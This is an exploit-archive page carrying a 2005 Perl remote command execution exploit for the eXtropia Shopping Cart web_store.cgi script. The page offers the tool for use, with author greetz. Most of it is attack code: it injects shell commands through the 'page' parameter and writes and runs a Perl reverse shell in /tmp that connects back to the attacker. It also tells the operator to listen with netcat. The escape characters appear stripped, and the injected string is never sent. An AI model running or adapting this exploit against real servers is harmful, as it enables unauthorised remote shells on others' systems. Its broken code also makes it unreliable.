[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : eXtropia Shopping Cart web_store.cgi Remote Exploit
# Published : 2005-06-15
# Author : Action Spider
# Previous Title : Download Center Lite (DCL) <= 1.5 Remote File Inclusion
# Next Title : Mambo 4.5.2.1 Fetch Password Hash Remote Exploit


#!/usr/bin/perl -w
#
#********************************************************************************************
#               Remote Command Execution Vulnerability In Web_store.cgi                     *
#                                                                                           *
#                              [SegmentationFault Group]                                    *
#                                                                                           *
#                                                                                           *
#             Greetz to  :  Xsupr3mo -  failed   - Status-x -  Stealh - P3S4D3L0            *
#             Greetz to  :  berhooz  -   nima  - ehsan   - Unknown  OutLaw  eutanasia       *
#                                      www.ashiyane.com                                     *
#                                                                                           *
#********************************************************************************************
#ok setp by setp to work :                      *                                           *
#[*] start exploit                              *   If connect back shell not found: maybe :*
#[*] run in your system: nc -l -vv -p 2975      *   you do not have perm to write in /tmp   *
#[*] starting connect back on 127.0.0.1 :2975   *            Shell not vulnerable           *
#[*] DONE!                                      *   test and put in /$path/hints.pl?|cd /tmp*
#[*] Look netcat windows                        *     other path that u know dont have perm *
#                                               *                                           *
#********************************************************************************************
#############################################################################################
use IO::Socket;

print "*****************************************************************n";
print "tRemote Command Execution Vulnerability in web_store.cgin  ";
print "tt-=[  SegmentationFault Group  ]=-n";      
print "ttcode writen    by sun-os [ActionSpider]nn";  
print "tGerttz to : Xsupr3mo -  failed   - Status-x -  Stealh";
print "ntand : Behrooz - nima - ehsan www.ashiyane.comn";
print "*****************************************************************nn";


print "enter hostname or ip : n";
chomp($server=<STDIN>);

print "port: (default: 80)n";
chomp($port=<STDIN>);
$port=80 if ($port =~/D/ );
$port=80 if ($port eq "" );

print "path: (???/web_store.cgi?)n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): n";
chomp($reverse=<STDIN>);

print "ok Remote Command Execution now Start";
print "|+| try to exploiting...n";

$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!n");connect(SOCKET, $paddr) || die("Error: $!n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";

print "|+| OK! n";
print "|+| NOW, run in your system: nc -l -vv -p $reversen";
print "|+| starting connect back on $ip :$reversen";
print "|+| DONE!n";
print "|+| Look netcat windowsnn";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die;

print $socket "POST $path HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "User-Agent: blackboxn";
print $socket "Pragma: no-cachen";
print $socket "Cache-Control: no-cachen";
print $socket "Connection: closenn";

print "have nice shell...";

# www.Syue.com [2005-06-15]